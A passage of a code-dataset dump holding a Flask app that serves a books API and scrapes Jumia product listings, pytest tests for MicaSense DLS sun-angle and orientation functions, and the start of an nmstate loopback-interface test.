old_event.pop(Event.SOURCE)\n data = old_event.pop(Event.DATA, None)\n meta = old_event.pop(Event.META, None)\n\n result = Event(\n _type=_type,\n source=source,\n data=data,\n meta=meta)\n\n return result\n\n @classmethod\n def get_type(cls):\n \"\"\"\n Get unique event type name\n \"\"\"\n\n result = cls.__name__.lower()\n\n return result\n\n\n# Change default timeout from 1 to 3 , conflict with gunicorn\nsetdefaulttimeout(3)\n\nregexp_ip = re_compile(\n \"([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\")\n\ndns_cache = {}\ncache_time = 60 * 30 # 30min\n\nlogger = getLogger('event')\n\n\ndef forger(\n event_type,\n entity=None,\n connector=Event.CONNECTOR,\n connector_name=Event.CONNECTOR_NAME,\n source_type='component',\n component=None,\n resource=None,\n timestamp=None,\n state=0,\n state_type=1,\n output=None,\n long_output=None,\n perf_data=None,\n perf_data_array=None,\n address=None,\n domain=None,\n reverse_lookup=True,\n display_name=None,\n tags=[],\n ticket=None,\n ref_rk=None,\n component_problem=False,\n author=None,\n perimeter=None,\n keep_state=None,\n **kwargs\n):\n \"\"\"\n Build an event from scratch.\n \"\"\"\n\n if not timestamp:\n timestamp = int(time())\n\n if not component:\n component = getfqdn()\n if not component:\n component = gethostname()\n\n if not state:\n state = 0\n\n if not address:\n if bool(regexp_ip.match(component)):\n address = component\n if reverse_lookup:\n dns = None\n\n # get from cache\n try:\n (timestamp, dns) = dns_cache[address.replace('.', '-')]\n logger.info(\"Use DNS lookup from cache\")\n if (timestamp + cache_time) < int(time()):\n logger.info(\" + Cache is too old\")\n del dns_cache[address.replace('.', '-')]\n dns = None\n except Exception:\n logger.info(\" + '%s' not in cache\" % address)\n\n # reverse lookup\n if not dns:\n try:\n logger.info(\n \"DNS reverse lookup for '%s' ...\" % address)\n dns = gethostbyaddr(address)\n logger.info(\" + Succes: '%s'\" % dns[0])\n dns_cache[address.replace('.', '-')] = \\\n (int(time()), dns)\n except Exception:\n logger.info(\" + Failed\")\n\n # Dns ok\n if dns:\n # Split FQDN\n fqdn = dns[0]\n component = fqdn.split('.', 1)[0]\n if not domain:\n try:\n domain = fqdn.split('.', 1)[1]\n except Exception:\n pass\n\n if dns:\n logger.info(\" + Component: %s\" % component)\n logger.info(\" + Address: %s\" % address)\n logger.info(\" + Domain: %s\" % domain)\n\n dump = {\n 'connector': connector,\n 'connector_name': connector_name,\n 'event_type': event_type,\n 'source_type': source_type,\n 'component': component,\n 'timestamp': timestamp,\n 'state': state,\n 'state_type': state_type,\n 'output': output,\n 'long_output': long_output,\n }\n\n if entity:\n dump[Event.ENTITY] = entity\n\n if resource:\n dump[Event.SOURCE_TYPE] = Event.RESOURCE\n dump[Event.RESOURCE] = resource\n\n if author is not None:\n dump[\"author\"] = author\n\n if perimeter:\n dump[\"perimeter\"] = perimeter\n\n if keep_state:\n dump[\"keep_state\"] = keep_state\n\n if perf_data:\n dump[\"perf_data\"] = perf_data\n\n if perf_data_array:\n dump[\"perf_data_array\"] = perf_data_array\n\n if address:\n dump[\"address\"] = address\n\n if domain:\n dump[\"domain\"] = domain\n\n if tags:\n dump[\"tags\"] = tags\n\n if display_name:\n dump[\"display_name\"] = display_name\n\n if ticket:\n dump[\"ticket\"] = ticket\n\n if ref_rk:\n dump[\"ref_rk\"] = ref_rk\n\n if event_type == 'check' and resource:\n dump['component_problem'] = component_problem\n\n if kwargs:\n dump.update(kwargs)\n\n return dump\n\n\ndef get_routingkey(event):\n \"\"\"\n Build the routing key from an event.\n\n If the key 'resource' is present and != '', 'source_type' is forced to\n 'resource', otherwise 'component'.\n\n This function mutates the 'source_type' field if necessary.\n\n :raise KeyError: on missing required info\n \"\"\"\n event[Event.SOURCE_TYPE] = Event.COMPONENT\n if event.get(Event.RESOURCE, ''):\n event[Event.SOURCE_TYPE] = Event.RESOURCE\n\n rk = u\"{}.{}.{}.{}.{}\".format(\n event[Event.CONNECTOR],\n event[Event.CONNECTOR_NAME],\n event[Event.EVENT_TYPE],\n event[Event.SOURCE_TYPE],\n event[Event.COMPONENT]\n )\n\n if event.get(Event.RESOURCE, ''):\n rk = u\"{}.{}\".format(rk, event[Event.RESOURCE])\n\n return rk\n\n\ndef is_component_problem(event):\n if event.get(Event.RESOURCE, '') and event['state'] != 0:\n storage = get_storage(\n namespace='entities',\n account=Account(user='root', group='root')).get_backend()\n\n component = storage.find_one({\n 'type': 'component',\n 'name': event[Event.COMPONENT]\n })\n\n if component and 'state' in component and component['state'] != 0:\n return True\n\n return False\n\n\ndef is_host_acknowledged(event):\n if is_component_problem(event):\n storage = get_storage(\n namespace='entities',\n account=Account(user='root', group='root')).get_backend()\n\n ack = storage.find_one({\n 'type': 'ack',\n 'component': event[Event.COMPONENT],\n 'resource': None\n })\n\n if ack:\n return True\n\n return False\n","repo_name":"merouaneagar/canopsis","sub_path":"sources/canopsis/canopsis/event/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"1625494834","text":"class Sequence( object ) :\n \"\"\" Describe a sequence, used to know sequence of operation\"\"\"\n\n def __init__( self, operations ):\n\n self.stack = list()\n self.operations = list()\n\n # depth first search\n self.stack.append( operations )\n while len( self.stack ) != 0 :\n\n element = self.stack.pop()\n element.sequence = self\n self.operations.append( element )\n for child in element.children :\n self.stack.append( child )\n","repo_name":"coberger/PythonTestCern","sub_path":"testMockDirac/Sequence.py","file_name":"Sequence.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"900878688","text":"import pytest\nimport numpy as np\nfrom numpy.testing import assert_almost_equal\nfrom gridworld import Gridworld\n\n\n@pytest.fixture()\ndef gridworld():\n height = 5\n width = 5\n state_A = (0, 1)\n state_B = (0, 3)\n from_A = (4, 1)\n from_B = (2, 3)\n reward_leaving_state_A = 10\n reward_leaving_state_B = 5\n gamma = 0.9\n return Gridworld(height, width,\n state_A, state_B,\n from_A, from_B,\n reward_leaving_state_A, reward_leaving_state_B,\n gamma)\n\n\ndef test_get_state_value_correctly(gridworld):\n expected = np.array([[3.3, 8.8, 4.4, 5.3, 1.5],\n [1.5, 3.0, 2.3, 1.9, 0.5],\n [0.1, 0.7, 0.7, 0.4, -0.4],\n [-1.0, -0.4, -0.4, -0.6, -1.2],\n [-1.9, -1.3, -1.2, -1.4, -2.0]\n ])\n assert_almost_equal(np.round(gridworld.state_values, decimals=1), expected)\n\n\ndef test_get_optimum_state_value_correctly(gridworld):\n gridworld.build_optimum_state_value()\n expected = np.array([[22.0, 24.4, 22.0, 19.4, 17.5],\n [19.8, 22.0, 19.8, 17.8, 16.0],\n [17.8, 19.8, 17.8, 16.0, 14.4],\n [16.0, 17.8, 16.0, 14.4, 13.0],\n [14.4, 16.0, 14.4, 13.0, 11.7]\n ])\n assert_almost_equal(np.round(gridworld.state_values, decimals=1), expected)\n","repo_name":"staftermath/reinforcement_learning_an_introduction","sub_path":"tests/test_gridworld.py","file_name":"test_gridworld.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40891518813","text":"from riotwatcher import RiotWatcher, ApiError\nfrom misc import FileAccess\nfrom misc import Colors\n\n\ndef verify_api_key(api_key):\n while True:\n watcher = RiotWatcher(api_key)\n try:\n watcher.summoner.by_name('NA1', 'mintyorange')\n except ApiError as err:\n if err.response.status_code == 403 or 401:\n Colors.print_reset(Colors.WARNING + \"Invalid API key.\")\n Colors.print_reset(Colors.OKBLUE + \"Please enter a valid Riot API key:\")\n api_key = input()\n continue\n else:\n raise\n break\n FileAccess.write(\"api_key.txt\", api_key)\n return watcher\n\n\ndef get_watcher():\n api_key = FileAccess.read(\"api_key.txt\")\n if api_key is not None:\n Colors.print_reset(Colors.OKBLUE + \"Using api key from file...\")\n else:\n Colors.print_reset(Colors.OKBLUE + \"Please enter a valid Riot API key:\")\n api_key = input()\n return verify_api_key(api_key)\n\n\n\n","repo_name":"minorenji/RiotAPIExploration","sub_path":"api_object.py","file_name":"api_object.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17902751993","text":"# -*- coding: utf-8 -*-\n\"\"\"GNUmed xDT viewer.\n\nTODO:\n\n- popup menu on right-click\n - import this line\n - import all lines like this\n - search\n - print\n - ...\n\"\"\"\n#=============================================================================\n__author__ = \"S.Hilbert, K.Hilbert\"\n\nimport sys, os, os.path, io, logging\n\n\nimport wx\n\n\nfrom Gnumed.wxpython import gmGuiHelpers, gmPlugin\nfrom Gnumed.pycommon import gmI18N, gmDispatcher\nfrom Gnumed.business import gmXdtMappings, gmXdtObjects\nfrom Gnumed.wxGladeWidgets import wxgXdtListPnl\nfrom Gnumed.wxpython import gmAccessPermissionWidgets\n\n\n_log = logging.getLogger('gm.ui')\n\n#=============================================================================\n# FIXME: this belongs elsewhere under wxpython/\nclass cXdtListPnl(wxgXdtListPnl.wxgXdtListPnl):\n\tdef __init__(self, *args, **kwargs):\n\t\twxgXdtListPnl.wxgXdtListPnl.__init__(self, *args, **kwargs)\n\n\t\tself.filename = None\n\n\t\tself.__cols = [\n\t\t\t_('Field name'),\n\t\t\t_('Interpreted content'),\n\t\t\t_('xDT field ID'),\n\t\t\t_('Raw content')\n\t\t]\n\t\tself.__init_ui()\n\t#--------------------------------------------------------------\n\tdef __init_ui(self):\n\t\tfor col in range(len(self.__cols)):\n\t\t\tself._LCTRL_xdt.InsertColumn(col, self.__cols[col])\n\t#--------------------------------------------------------------\n\t# external API\n\t#--------------------------------------------------------------\n\tdef select_file(self, path=None):\n\t\tif path is None:\n\t\t\troot_dir = os.path.expanduser(os.path.join('~', 'gnumed'))\n\t\telse:\n\t\t\troot_dir = path\n\t\t# get file name\n\t\t# - via file select dialog\n\t\tdlg = wx.FileDialog (\n\t\t\tparent = self,\n\t\t\tmessage = _(\"Choose an xDT file\"),\n\t\t\tdefaultDir = root_dir,\n\t\t\tdefaultFile = '',\n\t\t\twildcard = '%s (*.xDT)|*.?DT;*.?dt|%s (*)|*|%s (*.*)|*.*' % (_('xDT files'), _('all files'), _('all files (Win)')),\n\t\t\tstyle = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\n\t\t)\n\t\tchoice = dlg.ShowModal()\n\t\tfname = None\n\t\tif choice == wx.ID_OK:\n\t\t\tfname = dlg.GetPath()\n\t\tdlg.DestroyLater()\n\t\treturn fname\n\t#--------------------------------------------------------------\n\tdef load_file(self, filename=None):\n\t\tif filename is None:\n\t\t\tfilename = self.select_file()\n\t\tif filename is None:\n\t\t\treturn True\n\n\t\tself.filename = None\n\n\t\ttry:\n\t\t\tf = open(filename, 'r')\n\t\texcept IOError:\n\t\t\tgmGuiHelpers.gm_show_error (\n\t\t\t\t_('Cannot access xDT file\\n\\n'\n\t\t\t\t ' [%s]'),\n\t\t\t\t_('loading xDT file')\n\t\t\t)\n\t\t\treturn False\n\t\tf.close()\n\n\t\tencoding = gmXdtObjects.determine_xdt_encoding(filename = filename)\n\t\tif encoding is None:\n\t\t\tencoding = 'utf8'\n\t\t\tgmDispatcher.send(signal = 'statustext', msg = _('Encoding missing in xDT file. Assuming [%s].') % encoding)\n\t\t\t_log.warning('xDT file [%s] does not define an encoding, assuming [%s]' % (filename, encoding))\n\n\t\ttry:\n\t\t\txdt_file = io.open(filename, mode = 'rt', encoding = encoding, errors = 'replace')\n\t\texcept IOError:\n\t\t\tgmGuiHelpers.gm_show_error (\n\t\t\t\t_('Cannot access xDT file\\n\\n'\n\t\t\t\t ' [%s]'),\n\t\t\t\t_('loading xDT file')\n\t\t\t)\n\t\t\treturn False\n\n\t\t# parse and display file\n\t\tself._LCTRL_xdt.DeleteAllItems()\n\n\t\tself._LCTRL_xdt.InsertItem(index=0, label=_('name of xDT file'))\n\t\tself._LCTRL_xdt.SetItem(index=0, column=1, label=filename)\n\n\t\tidx = 1\n\t\tfor line in xdt_file:\n\t\t\tline = line.replace('\\015','')\n\t\t\tline = line.replace('\\012','')\n\t\t\tlength, field, content = line[:3], line[3:7], line[7:]\n\n\t\t\ttry:\n\t\t\t\tleft = gmXdtMappings.xdt_id_map[field]\n\t\t\texcept KeyError:\n\t\t\t\tleft = field\n\n\t\t\ttry:\n\t\t\t\tright = gmXdtMappings.xdt_map_of_content_maps[field][content]\n\t\t\texcept KeyError:\n\t\t\t\tright = content\n\n\t\t\tself._LCTRL_xdt.InsertItem(index=idx, label=left)\n\t\t\tself._LCTRL_xdt.SetItem(index=idx, column=1, label=right)\n\t\t\tself._LCTRL_xdt.SetItem(index=idx, column=2, label=field)\n\t\t\tself._LCTRL_xdt.SetItem(index=idx, column=3, label=content)\n\t\t\tidx += 1\n\n\t\txdt_file.close()\n\n\t\tself._LCTRL_xdt.SetColumnWidth(0, wx.LIST_AUTOSIZE)\n\t\tself._LCTRL_xdt.SetColumnWidth(1, wx.LIST_AUTOSIZE)\n\n\t\tself._LCTRL_xdt.SetFocus()\n\t\tself._LCTRL_xdt.SetItemState (\n\t\t\titem = 0,\n\t\t\tstate = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED,\n\t\t\tstateMask = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED\n\t\t)\n\n\t\tself.filename = filename\n\t#--------------------------------------------------------------\n\t# event handlers\n\t#--------------------------------------------------------------\n\tdef _on_load_button_pressed(self, evt):\n\t\tself.load_file()\n\t#--------------------------------------------------------------\n\t# plugin API\n\t#--------------------------------------------------------------\n\tdef repopulate_ui(self):\n#\t\tif self.filename is None:\n#\t\t\tself.load_file()\n\t\treturn\n#=============================================================================\nclass gmXdtViewerPanel(wx.Panel):\n\tdef __init__(self, parent, aFileName = None):\n\t\twx.Panel.__init__(self, parent, -1, style=wx.WANTS_CHARS)\n\n\t\t# our actual list\n\t\ttID = wx.NewId()\n\t\tself.list = gmXdtListCtrl(\n\t\t\tself,\n\t\t\ttID,\n\t\t\tstyle=wx.LC_REPORT | wx.SUNKEN_BORDER | wx.LC_VRULES\n\t\t)#|wx.LC_HRULES)\n\n\t\tself.list.InsertColumn(0, _(\"XDT field\"))\n\t\tself.list.InsertColumn(1, _(\"XDT field content\"))\n\n\t\tself.filename = aFileName\n\n\t\t# set up events\n\t\twx.EVT_SIZE(self, self.OnSize)\n\n\t\twx.EVT_LIST_ITEM_SELECTED(self, tID, self.OnItemSelected)\n\t\twx.EVT_LIST_ITEM_DESELECTED(self, tID, self.OnItemDeselected)\n\t\twx.EVT_LIST_ITEM_ACTIVATED(self, tID, self.OnItemActivated)\n\t\twx.EVT_LIST_DELETE_ITEM(self, tID, self.OnItemDelete)\n\n\t\twx.EVT_LIST_COL_CLICK(self, tID, self.OnColClick)\n\t\twx.EVT_LIST_COL_RIGHT_CLICK(self, tID, self.OnColRightClick)\n#\t\twx.EVT_LIST_COL_BEGIN_DRAG(self, tID, self.OnColBeginDrag)\n#\t\twx.EVT_LIST_COL_DRAGGING(self, tID, self.OnColDragging)\n#\t\twx.EVT_LIST_COL_END_DRAG(self, tID, self.OnColEndDrag)\n\n\t\twx.EVT_LEFT_DCLICK(self.list, self.OnDoubleClick)\n\t\twx.EVT_RIGHT_DOWN(self.list, self.OnRightDown)\n\n\t\tif wx.Platform == '__WXMSW__':\n\t\t\twx.EVT_COMMAND_RIGHT_CLICK(self.list, tID, self.OnRightClick)\n\t\telif wx.Platform == '__WXGTK__':\n\t\t\twx.EVT_RIGHT_UP(self.list, self.OnRightClick)\n\n\t#-------------------------------------------------------------------------\n\tdef Populate(self):\n\n\t\t# populate list\n\t\titems = self.__decode_xdt()\n\t\tfor item_idx in range(len(items),0,-1):\n\t\t\tdata = items[item_idx]\n\t\t\tidx = self.list.InsertItem(info=wx.ListItem())\n\t\t\tself.list.SetItem(index=idx, column=0, label=data[0])\n\t\t\tself.list.SetItem(index=idx, column=1, label=data[1])\n\t\t\t#self.list.SetItemData(item_idx, item_idx)\n\n\t\t# reaspect\n\t\tself.list.SetColumnWidth(0, wx.LIST_AUTOSIZE)\n\t\tself.list.SetColumnWidth(1, wx.LIST_AUTOSIZE)\n\n\t\t# show how to select an item\n\t\t#self.list.SetItemState(5, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)\n\n\t\t# show how to change the colour of a couple items\n\t\t#item = self.list.GetItem(1)\n\t\t#item.SetTextColour(wx.BLUE)\n\t\t#self.list.SetItem(item)\n\t\t#item = self.list.GetItem(4)\n\t\t#item.SetTextColour(wxRED)\n\t\t#self.list.SetItem(item)\n\n\t\tself.currentItem = 0\n\t#-------------------------------------------------------------------------\n\tdef __decode_xdt(self):\n\t\tif self.filename is None:\n\t\t\t_log.error(\"Need name of file to parse !\")\n\t\t\treturn None\n\n\t\txDTFile = fileinput.input(self.filename)\n\t\titems = {}\n\t\ti = 1\n\t\tfor line in xDTFile:\n\t\t\t# remove trailing CR and/or LF\n\t\t\tline = string.replace(line,'\\015','')\n\t\t\tline = string.replace(line,'\\012','') \n\t\t\tlength ,ID, content = line[:3], line[3:7], line[7:]\n\n\t\t\ttry:\n\t\t\t\tleft = xdt_id_map[ID]\n\t\t\texcept KeyError:\n\t\t\t\tleft = ID\n\n\t\t\ttry:\n\t\t\t\tright = xdt_map_of_content_maps[ID][content]\n\t\t\texcept KeyError:\n\t\t\t\tright = content\n\n\t\t\titems[i] = (left, right)\n\t\t\ti = i + 1\n\n\t\tfileinput.close()\n\t\treturn items\n\t#-------------------------------------------------------------------------\n\tdef OnRightDown(self, event):\n\t\tself.x = event.GetX()\n\t\tself.y = event.GetY()\n\t\titem, flags = self.list.HitTest((self.x, self.y))\n\t\tif flags & wx.LIST_HITTEST_ONITEM:\n\t\t\tself.list.Select(item)\n\t\tevent.Skip()\n\t#-------------------------------------------------------------------------\n\tdef getColumnText(self, index, col):\n\t\titem = self.list.GetItem(index, col)\n\t\treturn item.GetText()\n\t#-------------------------------------------------------------------------\n\tdef OnItemSelected(self, event):\n\t\tself.currentItem = event.ItemIndex\n\t#-------------------------------------------------------------------------\n\tdef OnItemDeselected(self, evt):\n\t\titem = evt.GetItem()\n\n\t\t# Show how to reselect something we don't want deselected\n#\t\tif evt.ItemIndex == 11:\n#\t\t\twxCallAfter(self.list.SetItemState, 11, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)\n\t#-------------------------------------------------------------------------\n\tdef OnItemActivated(self, event):\n\t\tself.currentItem = event.ItemIndex\n\t#-------------------------------------------------------------------------\n\tdef OnItemDelete(self, event):\n\t\tpass\n\t#-------------------------------------------------------------------------\n\tdef OnColClick(self, event):\n\t\tpass\n\t#-------------------------------------------------------------------------\n\tdef OnColRightClick(self, event):\n\t\titem = self.list.GetColumn(event.GetColumn())\n\t#-------------------------------------------------------------------------\n#\tdef OnColBeginDrag(self, event):\n#\t\tpass\n\t#-------------------------------------------------------------------------\n#\tdef OnColDragging(self, event):\n#\t\tpass\n\t#-------------------------------------------------------------------------\n#\tdef OnColEndDrag(self, event):\n#\t\tpass\n\t#-------------------------------------------------------------------------\n\tdef OnDoubleClick(self, event):\n\t\tevent.Skip()\n\t#-------------------------------------------------------------------------\n\tdef OnRightClick(self, event):\n\t\treturn\n\t\tmenu = wx.Menu()\n\t\ttPopupID1 = 0\n\t\ttPopupID2 = 1\n\t\ttPopupID3 = 2\n\t\ttPopupID4 = 3\n\t\ttPopupID5 = 5\n\n\t\t# Show how to put an icon in the menu\n\t\titem = wx.MenuItem(menu, tPopupID1,\"One\")\n\t\titem.SetBitmap(images.getSmilesBitmap())\n\n\t\tmenu.AppendItem(item)\n\t\tmenu.Append(tPopupID2, \"Two\")\n\t\tmenu.Append(tPopupID3, \"ClearAll and repopulate\")\n\t\tmenu.Append(tPopupID4, \"DeleteAllItems\")\n\t\tmenu.Append(tPopupID5, \"GetItem\")\n\t\twx.EVT_MENU(self, tPopupID1, self.OnPopupOne)\n\t\twx.EVT_MENU(self, tPopupID2, self.OnPopupTwo)\n\t\twx.EVT_MENU(self, tPopupID3, self.OnPopupThree)\n\t\twx.EVT_MENU(self, tPopupID4, self.OnPopupFour)\n\t\twx.EVT_MENU(self, tPopupID5, self.OnPopupFive)\n\t\tself.PopupMenu(menu, wxPoint(self.x, self.y))\n\t\tmenu.DestroyLater()\n\t\tevent.Skip()\n\t#-------------------------------------------------------------------------\n\tdef OnPopupOne(self, event):\n\t\tprint(\"FindItem:\", self.list.FindItem(-1, \"Roxette\"))\n\t\tprint(\"FindItemData:\", self.list.FindItemData(-1, 11))\n\t#-------------------------------------------------------------------------\n\tdef OnPopupTwo(self, event):\n\t\tpass\n\t#-------------------------------------------------------------------------\n\tdef OnPopupThree(self, event):\n\t\tself.list.ClearAll()\n\t\twx.CallAfter(self.PopulateList)\n\t\t#wxYield()\n\t\t#self.PopulateList()\n\t#-------------------------------------------------------------------------\n\tdef OnPopupFour(self, event):\n\t\tself.list.DeleteAllItems()\n\t#-------------------------------------------------------------------------\n\tdef OnPopupFive(self, event):\n\t\titem = self.list.GetItem(self.currentItem)\n\t\tprint(item.Text, item.Id, self.list.GetItemData(self.currentItem))\n\t#-------------------------------------------------------------------------\n\tdef OnSize(self, event):\n\t\tw,h = self.GetClientSize()\n\t\tself.list.SetDimensions(0, 0, w, h)\n#======================================================\nclass gmXdtViewer(gmPlugin.cNotebookPlugin):\n\t\"\"\"Plugin to encapsulate xDT list-in-panel viewer\"\"\"\n\n\ttab_name = _('xDT viewer')\n\trequired_minimum_role = 'non-clinical access'\n\n\t@gmAccessPermissionWidgets.verify_minimum_required_role (\n\t\trequired_minimum_role,\n\t\tactivity = _('loading plugin <%s>') % tab_name,\n\t\treturn_value_on_failure = False,\n\t\tfail_silently = False\n\t)\n\tdef register(self):\n\t\tgmPlugin.cNotebookPlugin.register(self)\n\t#-------------------------------------------------\n\n\tdef name(self):\n\t\treturn gmXdtViewer.tab_name\n\n\tdef GetWidget(self, parent):\n\t\tself._widget = cXdtListPnl(parent, -1)\n\t\treturn self._widget\n\n\tdef MenuInfo(self):\n\t\treturn ('tools', _('&xDT viewer'))\n\n\tdef can_receive_focus(self):\n\t\treturn True\n#======================================================\n# main\n#------------------------------------------------------\nif __name__ == '__main__':\n\tfrom Gnumed.pycommon import gmCfg2\n\n\tcfg = gmCfg2.gmCfgData()\n\tcfg.add_cli(long_options=['xdt-file='])\n\t#---------------------\n\t# set up dummy app\n\tclass TestApp (wx.App):\n\t\tdef OnInit (self):\n\n\t\t\tfname = \"\"\n\t\t\t# has the user manually supplied a config file on the command line ?\n\t\t\tfname = cfg.get(option = '--xdt-file', source_order = [('cli', 'return')])\n\t\t\tif fname is not None:\n\t\t\t\t_log.debug('XDT file is [%s]' % fname)\n\t\t\t\t# file valid ?\n\t\t\t\tif not os.access(fname, os.R_OK):\n\t\t\t\t\ttitle = _('Opening xDT file')\n\t\t\t\t\tmsg = _('Cannot open xDT file.\\n'\n\t\t\t\t\t\t\t'[%s]') % fname\n\t\t\t\t\tgmGuiHelpers.gm_show_error(msg, title)\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\ttitle = _('Opening xDT file')\n\t\t\t\tmsg = _('You must provide an xDT file on the command line.\\n'\n\t\t\t\t\t\t'Format: --xdt-file=
Distant Reading Archive
This site is a prototype API for distant reading of science fiction novels.
\"\n\n@app.route('/api/v1/resources/books/all', methods=['GET'])\ndef api_all():\n return jsonify(books)\n\n@app.route('/api/v1/resources/books', methods=['GET'])\ndef api_id():\n # Check if an ID was provided as part of the URL.\n # If ID is provided, assign it to a variable.\n # If no ID is provided, display an error in the browser.\n if 'id' in request.args:\n id = int(request.args['id'])\n else:\n return \"Error: No id field provided. Please specify an id.\"\n results = []\n\n for book in books:\n if book['id'] == id:\n results.append(book)\n return jsonify(results)\n\n\n@app.route('/api/awari/items', methods=['GET'])\ndef api_search():\n if 'search' in request.args:\n search = request.args['search']\n else:\n return \"Error: No id field provided. Please specify an id.\"\n results = []\n\n products = []\n for x in range(1, 4):\n baseurl = f\"https://www.jumia.com.ng/catalog/?q={search}&page={x}#catalog-listing\"\n\n r = requests.get(baseurl)\n\n soup = BeautifulSoup(r.content, 'lxml')\n\n myList = soup.find_all('article', class_='prd _fb col c-prd')\n\n for item in myList:\n name = item.find('h3', class_='name').text.strip()\n price = item.find('div', class_='prc').text.strip()\n imgUrl = item.find('img', class_='img').get('data-src')\n link = item.find('a', href=True)['href']\n\n my_dict = {'Product Name': name, 'Product Price': price, \"link\": link, \"image\": imgUrl}\n products.append(my_dict)\n\n\n return jsonify(products)\n \n# @app.route('/api/awari/konga', methods=['GET'])\n# def api_search_konga():\n# if 'search' in request.args:\n# search = request.args['search']\n# else:\n# return \"Error: No id field provided. Please specify an id.\"\n# results = []\n\n# products = []\n\n# baseurl = f\"https://jiji.ng/search?query={search}\"\n\n# r = requests.get(baseurl)\n\n# soup = BeautifulSoup(r.content, 'lxml')\n\n# myList = soup.find_all('div', class_='b-list-advert__item-wrapper')\n# print(\"list\",myList)\n\n# for item in myList:\n# name = item.find('div', class_='b-advert-title-inner qa-advert-title b-advert-title-inner--h3').text.strip()\n# price = item.find('div', class_='prc').text.strip()\n# imgUrl = item.find('picture', class_='h-flex-center h-width-100p h-height-100p h-overflow-hidden').get('srcset')\n# link = item.find('a', href=True)['href']\n\n# my_dict = {'Product Name': name, 'Product Price': price, \"link\": link, \"image\": imgUrl}\n# products.append(my_dict)\n\n\n# return jsonify(products)\n \n\n\napp.run()","repo_name":"kingwisdom/awaripython","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17000776524","text":"import pytest\nimport os, glob\nimport numpy as np\nimport math\n\nimport micasense.dls as dls\nimport micasense.image as image\n\n@pytest.fixture()\ndef img():\n image_path = os.path.join('data','0000SET','000',)\n return image.Image(os.path.join(image_path,'IMG_0000_1.tif'))\n\ndef test_sun_angle(img):\n if dls.havePysolar:\n sun_angle = dls.compute_sun_angle((img.latitude, img.longitude, img.altitude),\n (img.dls_yaw, img.dls_pitch, img.dls_roll),\n img.utc_time,\n np.array([0,0,-1]))\n assert sun_angle[0] == pytest.approx([-0.711, -0.247, -0.659], abs=0.001)\n assert sun_angle[1] == pytest.approx([-1.87482468e-01, 1.82720334e-05, -9.82267949e-01], abs=0.001)\n assert sun_angle[2] == pytest.approx(0.6754, abs=0.001)\n assert sun_angle[3] == pytest.approx(0.7193, abs=0.001)\n assert sun_angle[4] == pytest.approx(-0.334, abs=0.001)\n else:\n assert True\n\ndef test_fresnel():\n assert dls.fresnel(0.00) == pytest.approx(0.9416, abs=0.001)\n assert dls.fresnel(0.01) == pytest.approx(0.9416, abs=0.001)\n assert dls.fresnel(0.50) == pytest.approx(0.940, abs=0.001)\n assert dls.fresnel(0.99) == pytest.approx(0.903, abs=0.001)\n assert dls.fresnel(1.00) == pytest.approx(0.901, abs=0.001)\n\ndef test_get_orientation_zenith():\n pose = (math.radians(0),math.radians(0), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([0,0,-1])\n\ndef test_get_orientation_north():\n pose = (math.radians(0),math.radians(-90), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([1,0,0])\n\ndef test_get_orientation_east():\n pose = (math.radians(90),math.radians(-90), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([0,1,0])\n\ndef test_get_orientation_south():\n pose = (math.radians(0),math.radians(90), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([-1,0,0])\n\ndef test_get_orientation_south2():\n pose = (math.radians(180),math.radians(-90), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([-1,0,0])\n\ndef test_get_orientation_west():\n pose = (math.radians(-90),math.radians(-90), math.radians(0))\n orientation = [0,0,-1]\n ned = dls.get_orientation(pose, orientation)\n assert ned == pytest.approx([0,-1,0])","repo_name":"rasmusfenger/micasense_imageprocessing_sequoia","sub_path":"tests/test_dls.py","file_name":"test_dls.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36412050463","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n\nimport pytest\n\nimport libnmstate\n\nfrom libnmstate.error import NmstateDependencyError\nfrom libnmstate.schema import Interface\nfrom libnmstate.schema import InterfaceIPv4\nfrom libnmstate.schema import InterfaceIPv6\nfrom libnmstate.schema import InterfaceType\nfrom libnmstate.schema import InterfaceState\n\nfrom .testlib import assertlib\nfrom .testlib import statelib\nfrom .testlib.env import nm_minor_version\n\nIPV4_ADDRESS1 = \"192.0.2.251\"\nIPV6_ADDRESS1 = \"2001:db8:1::1\"\n\n\n@pytest.fixture\ndef loopback_cleanup():\n yield\n libnmstate.apply(\n {\n Interface.KEY: [\n {\n Interface.NAME: \"lo\",\n Interface.TYPE: InterfaceType.LOOPBACK,\n Interface.STATE: InterfaceState.ABSENT,\n },\n ]\n },\n verify_change=False,\n )\n\n\n@pytest.mark.skipif(\n nm_minor_version() >= 41,\n reason=(\"Loopback is supported by NetworkManager 1.41+\"),\n)\ndef test_loopback_not_supported_by_nm():\n with pytest.raises(NmstateDependencyError):\n libnmstate.apply(\n {\n Interface.KEY: [\n {\n 